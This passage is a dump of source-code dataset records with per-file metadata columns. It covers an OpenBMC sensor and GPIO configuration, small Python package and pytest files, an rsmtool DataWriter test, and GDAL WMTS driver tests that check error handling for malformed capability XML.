'PRODUCT_19': '<inventory_root>/system/chassis/motherboard/dimm7',
'PRODUCT_20': '<inventory_root>/system/chassis/motherboard/dimm8',
'PRODUCT_21': '<inventory_root>/system/chassis/motherboard/dimm9',
'PRODUCT_22': '<inventory_root>/system/chassis/motherboard/dimm10',
'PRODUCT_23': '<inventory_root>/system/chassis/motherboard/dimm11',
'PRODUCT_24': '<inventory_root>/system/chassis/motherboard/dimm12',
'PRODUCT_25': '<inventory_root>/system/chassis/motherboard/dimm13',
'PRODUCT_26': '<inventory_root>/system/chassis/motherboard/dimm14',
'PRODUCT_27': '<inventory_root>/system/chassis/motherboard/dimm15',
'PRODUCT_28': '<inventory_root>/system/chassis/motherboard/dimm16',
'PRODUCT_29': '<inventory_root>/system/chassis/motherboard/dimm17',
'PRODUCT_30': '<inventory_root>/system/chassis/motherboard/dimm18',
'PRODUCT_31': '<inventory_root>/system/chassis/motherboard/dimm19',
'PRODUCT_32': '<inventory_root>/system/chassis/motherboard/dimm20',
'PRODUCT_33': '<inventory_root>/system/chassis/motherboard/dimm21',
'PRODUCT_34': '<inventory_root>/system/chassis/motherboard/dimm22',
'PRODUCT_35': '<inventory_root>/system/chassis/motherboard/dimm23',
'PRODUCT_36': '<inventory_root>/system/chassis/motherboard/dimm24',
'PRODUCT_37': '<inventory_root>/system/chassis/motherboard/dimm25',
'PRODUCT_38': '<inventory_root>/system/chassis/motherboard/dimm26',
'PRODUCT_39': '<inventory_root>/system/chassis/motherboard/dimm27',
'PRODUCT_40': '<inventory_root>/system/chassis/motherboard/dimm28',
'PRODUCT_41': '<inventory_root>/system/chassis/motherboard/dimm29',
'PRODUCT_42': '<inventory_root>/system/chassis/motherboard/dimm30',
'PRODUCT_43': '<inventory_root>/system/chassis/motherboard/dimm31',
'PRODUCT_47': '<inventory_root>/system/misc',
},
'SENSOR': {
0x02: '/org/openbmc/sensors/host/HostStatus',
0x03: '/org/openbmc/sensors/host/BootProgress',
0x5a: '<inventory_root>/system/chassis/motherboard/cpu0',
0xa4: '<inventory_root>/system/chassis/motherboard/cpu1',
0x1e: '<inventory_root>/system/chassis/motherboard/dimm3',
0x1f: '<inventory_root>/system/chassis/motherboard/dimm2',
0x20: '<inventory_root>/system/chassis/motherboard/dimm1',
0x21: '<inventory_root>/system/chassis/motherboard/dimm0',
0x22: '<inventory_root>/system/chassis/motherboard/dimm7',
0x23: '<inventory_root>/system/chassis/motherboard/dimm6',
0x24: '<inventory_root>/system/chassis/motherboard/dimm5',
0x25: '<inventory_root>/system/chassis/motherboard/dimm4',
0x26: '<inventory_root>/system/chassis/motherboard/dimm11',
0x27: '<inventory_root>/system/chassis/motherboard/dimm10',
0x28: '<inventory_root>/system/chassis/motherboard/dimm9',
0x29: '<inventory_root>/system/chassis/motherboard/dimm8',
0x2a: '<inventory_root>/system/chassis/motherboard/dimm15',
0x2b: '<inventory_root>/system/chassis/motherboard/dimm14',
0x2c: '<inventory_root>/system/chassis/motherboard/dimm13',
0x2d: '<inventory_root>/system/chassis/motherboard/dimm12',
0x2e: '<inventory_root>/system/chassis/motherboard/dimm19',
0x2f: '<inventory_root>/system/chassis/motherboard/dimm18',
0x30: '<inventory_root>/system/chassis/motherboard/dimm17',
0x31: '<inventory_root>/system/chassis/motherboard/dimm16',
0x32: '<inventory_root>/system/chassis/motherboard/dimm23',
0x33: '<inventory_root>/system/chassis/motherboard/dimm22',
0x34: '<inventory_root>/system/chassis/motherboard/dimm21',
0x35: '<inventory_root>/system/chassis/motherboard/dimm20',
0x36: '<inventory_root>/system/chassis/motherboard/dimm27',
0x37: '<inventory_root>/system/chassis/motherboard/dimm26',
0x38: '<inventory_root>/system/chassis/motherboard/dimm25',
0x39: '<inventory_root>/system/chassis/motherboard/dimm24',
0x3a: '<inventory_root>/system/chassis/motherboard/dimm31',
0x3b: '<inventory_root>/system/chassis/motherboard/dimm30',
0x3c: '<inventory_root>/system/chassis/motherboard/dimm29',
0x3d: '<inventory_root>/system/chassis/motherboard/dimm28',
0x3e: '<inventory_root>/system/chassis/motherboard/cpu0/core0',
0x3f: '<inventory_root>/system/chassis/motherboard/cpu0/core1',
0x40: '<inventory_root>/system/chassis/motherboard/cpu0/core2',
0x41: '<inventory_root>/system/chassis/motherboard/cpu0/core3',
0x42: '<inventory_root>/system/chassis/motherboard/cpu0/core4',
0x43: '<inventory_root>/system/chassis/motherboard/cpu0/core5',
0x44: '<inventory_root>/system/chassis/motherboard/cpu0/core6',
0x45: '<inventory_root>/system/chassis/motherboard/cpu0/core7',
0x46: '<inventory_root>/system/chassis/motherboard/cpu0/core8',
0x47: '<inventory_root>/system/chassis/motherboard/cpu0/core9',
0x48: '<inventory_root>/system/chassis/motherboard/cpu0/core10',
0x49: '<inventory_root>/system/chassis/motherboard/cpu0/core11',
0x4a: '<inventory_root>/system/chassis/motherboard/cpu1/core0',
0x4b: '<inventory_root>/system/chassis/motherboard/cpu1/core1',
0x4c: '<inventory_root>/system/chassis/motherboard/cpu1/core2',
0x4d: '<inventory_root>/system/chassis/motherboard/cpu1/core3',
0x4e: '<inventory_root>/system/chassis/motherboard/cpu1/core4',
0x4f: '<inventory_root>/system/chassis/motherboard/cpu1/core5',
0x50: '<inventory_root>/system/chassis/motherboard/cpu1/core6',
0x51: '<inventory_root>/system/chassis/motherboard/cpu1/core7',
0x52: '<inventory_root>/system/chassis/motherboard/cpu1/core8',
0x53: '<inventory_root>/system/chassis/motherboard/cpu1/core9',
0x54: '<inventory_root>/system/chassis/motherboard/cpu1/core10',
0x55: '<inventory_root>/system/chassis/motherboard/cpu1/core11',
0x56: '<inventory_root>/system/chassis/motherboard/membuf0',
0x57: '<inventory_root>/system/chassis/motherboard/membuf1',
0x58: '<inventory_root>/system/chassis/motherboard/membuf2',
0x59: '<inventory_root>/system/chassis/motherboard/membuf3',
0x5a: '<inventory_root>/system/chassis/motherboard/membuf4',
0x5b: '<inventory_root>/system/chassis/motherboard/membuf5',
0x5c: '<inventory_root>/system/chassis/motherboard/membuf6',
0x5d: '<inventory_root>/system/chassis/motherboard/membuf7',
0x07: '/org/openbmc/sensors/host/BootCount',
0x0c: '<inventory_root>/system/chassis/motherboard',
0x01: '<inventory_root>/system/systemevent',
0x08: '<inventory_root>/system/powerlimit',
0x0d: '<inventory_root>/system/chassis/motherboard/refclock',
0x0e: '<inventory_root>/system/chassis/motherboard/pcieclock',
0x0f: '<inventory_root>/system/chassis/motherboard/todclock',
0x10: '<inventory_root>/system/chassis/motherboard/apss',
0x02: '/org/openbmc/sensors/host/OperatingSystemStatus',
0x04: '<inventory_root>/system/chassis/motherboard/pcielink',
0x0b: '/xyz/openbmc_project/sensors/chassis/PowerSupplyRedundancy',
0xda: '/org/openbmc/sensors/host/TurboAllowed',
0xD8: '/org/openbmc/sensors/host/PowerSupplyDerating',
},
'GPIO_PRESENT': {}
}
GPIO_CONFIG = {}
GPIO_CONFIG['BMC_POWER_UP'] = \
{'gpio_pin': 'D1', 'direction': 'out'}
GPIO_CONFIG['SOFTWARE_PGOOD'] = \
{'gpio_pin': 'R1', 'direction': 'out'}
GPIO_CONFIG['SYS_PWROK_BUFF'] = \
{'gpio_pin': 'D2', 'direction': 'in'}
# PV_CP_MD_JTAG_ATTENTION_N
GPIO_CONFIG['CHECKSTOP'] = \
{'gpio_pin': 'J2', 'direction': 'falling'}
GPIO_CONFIG['BMC_CP0_RESET_N'] = \
{'gpio_pin': 'A1', 'direction': 'out'}
# pcie switch reset
GPIO_CONFIG['BMC_VS1_PERST_N'] = \
{'gpio_pin': 'B7', 'direction': 'out'}
# pcie slots reset - not connected?
GPIO_CONFIG['BMC_CP0_PERST_ENABLE_R'] = \
{'gpio_pin': 'A3', 'direction': 'out'}
# SOFT_FSI_DAT
GPIO_CONFIG['FSI_DATA'] = \
{'gpio_pin': 'E0', 'direction': 'out'}
# SOFT_FSI_CLK
GPIO_CONFIG['FSI_CLK'] = \
{'gpio_pin': 'AA0', 'direction': 'out'}
# BMC_FSI_IN_ENA
GPIO_CONFIG['FSI_ENABLE'] = \
{'gpio_pin': 'D0', 'direction': 'out'}
# FSI_JMFG0_PRSNT_N
GPIO_CONFIG['CRONUS_SEL'] = \
{'gpio_pin': 'A6', 'direction': 'out'}
# FP_PWR_BTN_N
GPIO_CONFIG['POWER_BUTTON'] = \
{'gpio_pin': 'I3', 'direction': 'both'}
# BMC_NMIBTN_IN_N
GPIO_CONFIG['RESET_BUTTON'] = \
{'gpio_pin': 'J1', 'direction': 'both'}
# FIXME: needed for Witherspoon?
# Tracked by openbmc/openbmc#814
# FP_ID_BTN_N
GPIO_CONFIG['IDBTN'] = \
{'gpio_pin': 'Q7', 'direction': 'out'}
# TODO openbmc/openbmc#2288 - Determine if any pci resets needed
GPIO_CONFIGS = {
'power_config': {
'power_good_in': 'SYS_PWROK_BUFF',
'power_up_outs': [
('SOFTWARE_PGOOD', True),
('BMC_POWER_UP', True),
],
'reset_outs': [
('BMC_CP0_RESET_N', False),
],
},
'hostctl_config': {
'fsi_data': 'FSI_DATA',
'fsi_clk': 'FSI_CLK',
'fsi_enable': 'FSI_ENABLE',
'cronus_sel': 'CRONUS_SEL',
'optionals': [
],
},
}
# Miscellaneous non-poll sensor with system specific properties.
# The sensor id is the same as those defined in ID_LOOKUP['SENSOR'].
MISC_SENSORS = {
0x07: {'class': 'BootCountSensor'},
0x03: {'class': 'BootProgressSensor'},
0x02: {'class': 'OperatingSystemStatusSensor'},
# Garrison value is used, Not in P9 XML yet.
0x0b: {'class': 'PowerSupplyRedundancySensor'},
0xda: {'class': 'TurboAllowedSensor'},
0xD8: {'class': 'PowerSupplyDeratingSensor'},
}
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| 59.8
| 108
| 0.679538
| 2,618
| 23,023
| 5.751719
| 0.152024
| 0.208925
| 0.305353
| 0.402311
| 0.801434
| 0.792336
| 0.388963
| 0.309072
| 0.30522
| 0.30522
| 0
| 0.041128
| 0.140338
| 23,023
| 384
| 109
| 59.955729
| 0.719685
| 0.031273
| 0
| 0.008876
| 0
| 0
| 0.692895
| 0.560259
| 0
| 0
| 0.022981
| 0.002604
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a7f09a0fc4dda11502fea5e66b1c4ca36f07620
| 80
|
py
|
Python
|
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
vapour/__init__.py
|
speedcell4/vapour
|
c00b9b8fffddf0b134bec3ebb26d961e0468194a
|
[
"MIT"
] | null | null | null |
from vapour.links.connections import *
from vapour.links.architectures import *
| 26.666667
| 40
| 0.825
| 10
| 80
| 6.6
| 0.6
| 0.30303
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 41
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0a8dff536e92a510b1fc49f36612bb8d04624379
| 6,715
|
py
|
Python
|
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_writer.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
import os
import numpy as np
import pandas as pd
from shutil import rmtree
from nose.tools import raises
from pandas.testing import assert_frame_equal
from rsmtool.container import DataContainer
from rsmtool.writer import DataWriter
class TestDataWriter:
def test_data_container_save_files(self):
data_sets = [{'name': 'dataset1', 'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B'])},
{'name': 'dataset2', 'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}]
container = DataContainer(data_sets)
directory = 'temp_directory_data_container_save_files_xyz'
os.makedirs(directory, exist_ok=True)
writer = DataWriter()
for file_type in ['json', 'csv', 'xlsx']:
if file_type != 'json':
writer.write_experiment_output(directory,
container,
dataframe_names=['dataset1'],
file_format=file_type)
else:
writer.write_experiment_output(directory,
container,
new_names_dict={'dataset1': 'aaa'},
dataframe_names=['dataset1'],
file_format=file_type)
aaa_json = pd.read_json(os.path.join(directory, 'aaa.json'))
ds_1_csv = pd.read_csv(os.path.join(directory, 'dataset1.csv'))
ds_1_xls = pd.read_excel(os.path.join(directory, 'dataset1.xlsx'))
output_dir = os.listdir(directory)
rmtree(directory)
assert sorted(output_dir) == sorted(['aaa.json', 'dataset1.csv', 'dataset1.xlsx'])
assert_frame_equal(container.dataset1, aaa_json)
assert_frame_equal(container.dataset1, ds_1_csv)
assert_frame_equal(container.dataset1, ds_1_xls)
def test_dictionary_save_files(self):
data_sets = {'dataset1': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B']),
'dataset2': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}
directory = 'temp_directory_dictionary_save_files_xyz'
os.makedirs(directory, exist_ok=True)
writer = DataWriter()
for file_type in ['json', 'csv', 'xlsx']:
if file_type != 'json':
writer.write_experiment_output(directory,
data_sets,
dataframe_names=['dataset1'],
file_format=file_type)
else:
writer.write_experiment_output(directory,
data_sets,
new_names_dict={'dataset1': 'aaa'},
dataframe_names=['dataset1'],
file_format=file_type)
aaa_json = pd.read_json(os.path.join(directory, 'aaa.json'))
ds_1_csv = pd.read_csv(os.path.join(directory, 'dataset1.csv'))
ds_1_xls = pd.read_excel(os.path.join(directory, 'dataset1.xlsx'))
output_dir = os.listdir(directory)
rmtree(directory)
assert sorted(output_dir) == sorted(['aaa.json', 'dataset1.csv', 'dataset1.xlsx'])
assert_frame_equal(data_sets['dataset1'], aaa_json)
assert_frame_equal(data_sets['dataset1'], ds_1_csv)
assert_frame_equal(data_sets['dataset1'], ds_1_xls)
@raises(KeyError)
def test_data_container_save_wrong_format(self):
data_sets = [{'name': 'dataset1', 'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B'])},
{'name': 'dataset2', 'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}]
container = DataContainer(data_sets)
directory = 'temp_directory_container_save_wrong_format_xyz'
writer = DataWriter()
writer.write_experiment_output(directory,
container,
dataframe_names=['dataset1'],
file_format='html')
def test_data_container_save_files_with_id(self):
data_sets = [{'name': 'dataset1', 'frame': pd.DataFrame(np.random.normal(size=(100, 2)),
columns=['A', 'B'])},
{'name': 'dataset2', 'frame': pd.DataFrame(np.random.normal(size=(120, 3)),
columns=['A', 'B', 'C'])}]
container = DataContainer(data_sets)
directory = 'temp_directory_save_files_with_id_xyz'
os.makedirs(directory, exist_ok=True)
writer = DataWriter('test')
for file_type in ['json', 'csv', 'xlsx']:
if file_type != 'json':
writer.write_experiment_output(directory,
container,
dataframe_names=['dataset1'],
file_format=file_type)
else:
writer.write_experiment_output(directory,
container,
new_names_dict={'dataset1': 'aaa'},
dataframe_names=['dataset1'],
file_format=file_type)
aaa_json = pd.read_json(os.path.join(directory, 'test_aaa.json'))
ds_1_csv = pd.read_csv(os.path.join(directory, 'test_dataset1.csv'))
ds_1_xls = pd.read_excel(os.path.join(directory, 'test_dataset1.xlsx'))
output_dir = os.listdir(directory)
rmtree(directory)
assert sorted(output_dir) == sorted(['test_aaa.json',
'test_dataset1.csv',
'test_dataset1.xlsx'])
assert_frame_equal(container.dataset1, aaa_json)
assert_frame_equal(container.dataset1, ds_1_csv)
assert_frame_equal(container.dataset1, ds_1_xls)
| 44.177632
| 96
| 0.495309
| 640
| 6,715
| 4.926563
| 0.134375
| 0.030447
| 0.050745
| 0.054234
| 0.865525
| 0.849984
| 0.821757
| 0.815731
| 0.79353
| 0.777989
| 0
| 0.020504
| 0.397171
| 6,715
| 151
| 97
| 44.470199
| 0.758399
| 0
| 0
| 0.707965
| 0
| 0
| 0.104095
| 0.02487
| 0
| 0
| 0
| 0
| 0.115044
| 1
| 0.035398
| false
| 0
| 0.070796
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ac26326d94bb2c3a7550896ae73255d0c891b90
| 131
|
py
|
Python
|
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
luc4sdreyer/gan
|
c8d5c18d8d6bff6d4f6b694d9898ffc33499398c
|
[
"MIT"
] | null | null | null |
import random
import pytest
import numpy as np
@pytest.fixture
def reset_random_seed():
random.seed(0)
np.random.seed(0)
| 13.1
| 24
| 0.732824
| 21
| 131
| 4.47619
| 0.52381
| 0.319149
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.175573
| 131
| 9
| 25
| 14.555556
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0aca04c941d5e88013969b24846b8c7b0d3e8862
| 63,880
|
py
|
Python
|
autotest/gdrivers/wmts.py
|
roman0yurin/gdal
|
349a0992c7ebd0c71e8014e00897b098e4ca16fb
|
[
"MIT"
] | 1
|
2017-08-23T13:32:41.000Z
|
2017-08-23T13:32:41.000Z
|
autotest/gdrivers/wmts.py
|
norBIT/gdal
|
64855dbee2cd0dff47da11d916c8d2703b4e99b8
|
[
"MIT"
] | 7
|
2018-04-09T09:35:42.000Z
|
2018-05-22T06:54:05.000Z
|
autotest/gdrivers/wmts.py
|
norBIT/gdal
|
64855dbee2cd0dff47da11d916c8d2703b4e99b8
|
[
"MIT"
] | 2
|
2018-05-03T15:34:36.000Z
|
2020-07-13T15:30:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: WMTS driver test suite.
# Author: Even Rouault, even dot rouault at spatialys.com
#
###############################################################################
# Copyright (c) 2015, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import shutil
sys.path.append( '../pymod' )
from osgeo import gdal
import gdaltest
###############################################################################
# Find WMTS driver
def wmts_1():
gdaltest.wmts_drv = gdal.GetDriverByName('WMTS')
if gdaltest.wmts_drv is not None and gdal.GetDriverByName('WMS') is None:
print('Missing WMS driver')
gdaltest.wmts_drv = None
if gdaltest.wmts_drv is not None:
gdal.SetConfigOption('CPL_CURL_ENABLE_VSIMEM', 'YES')
gdal.SetConfigOption('GDAL_DEFAULT_WMS_CACHE_PATH', '/vsimem/cache')
return 'success'
else:
return 'skip'
###############################################################################
# Error: no URL and invalid GDAL_WMTS service file documents
def wmts_2():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
ds = gdal.Open('<GDAL_WMTS>')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
ds = gdal.Open('<GDAL_WMTSxxx/>')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
ds = gdal.Open('<GDAL_WMTS></GDAL_WMTS>')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: invalid URL
def wmts_3():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:https://non_existing')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: invalid URL
def wmts_4():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/non_existing')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: invalid XML in GetCapabilities response
def wmts_5():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/invalid_getcapabilities.xml', '<invalid_xml')
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/invalid_getcapabilities.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: invalid content in GetCapabilities response
def wmts_6():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/invalid_getcapabilities.xml', '<Capabilities/>')
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/invalid_getcapabilities.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: no layers
def wmts_7():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/empty_getcapabilities.xml', '<Capabilities><Contents/></Capabilities>')
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/empty_getcapabilities.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: missing TileMatrixSetLink and Style
def wmts_8():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/missing.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
</Layer>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/missing.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: missing TileMatrixSet
def wmts_9():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/missing_tms.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/missing_tms.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: Missing SupportedCRS
def wmts_10():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/missing_SupportedCRS.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
</TileMatrixSet>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/missing_SupportedCRS.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: Cannot find TileMatrix in TileMatrixSet
def wmts_11():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/no_tilematrix.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
</TileMatrixSet>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/no_tilematrix.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: Missing required element in TileMatrix element
def wmts_12():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/missing_required_element_in_tilematrix.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.jpeg" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix/>
</TileMatrixSet>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/missing_required_element_in_tilematrix.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Error: Missing ResourceURL
def wmts_12bis():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_12bis.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
gdal.PushErrorHandler()
ds = gdal.Open('WMTS:/vsimem/wmts_12bis.xml')
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Minimal
def wmts_13():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/minimal.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template="/vsimem/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
